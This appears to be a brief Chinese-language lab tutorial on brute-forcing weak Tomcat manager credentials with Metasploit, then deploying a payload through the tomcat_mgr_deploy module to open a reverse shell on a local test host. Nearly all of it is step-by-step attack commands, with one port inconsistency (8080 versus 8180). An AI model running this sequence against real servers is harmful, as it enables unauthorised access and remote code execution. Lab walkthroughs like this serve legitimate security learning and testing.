Metasploit爆破Tomcat弱口令
Metasploit爆破Tomcat弱口令
0x00 tomcat 爆破
- nmap 扫描主机 【依然本地搭建的】执行命令 nmap –sV 192.168.6.16
可以发现8080端口开着tomcat
- kali终端中输入命令“msfconsole”,启动MSF终端。
- 在msf终端下输入命令“search tomcat”, 搜索tomcat的相关工具和攻击载荷
在终端输入“use auxiliary/scanner/http/tomcat_mgr_login”, 启用漏洞利用模块, 提示符就会提示进入到该路径下
在终端输入“show options ” 查看需要配置的参数
终端下输入“set RHOSTS 192.168.6.16”,设置攻击目标主机IP
终端下输入“set RPORT 8180”,设置攻击目标主机端口号
终端下输入“exploit”, 实施攻击
账户密码都是tomcat
- 0x01 反弹shell,建立会话
- 终端下输入“use exploit/multi/http/tomcat_mgr_deploy”
终端下输入“set RHOST 192.168.6.16”,设置攻击的目标主机IP
终端下输入“set RPORT 8080”,设置攻击目标主机端口号终端下输入“set username tomcat”,设置攻击时使用的登录账号tomcat
终端下输入“set password tomcat”,设置攻击时使用的密码tomcatrun 开始攻击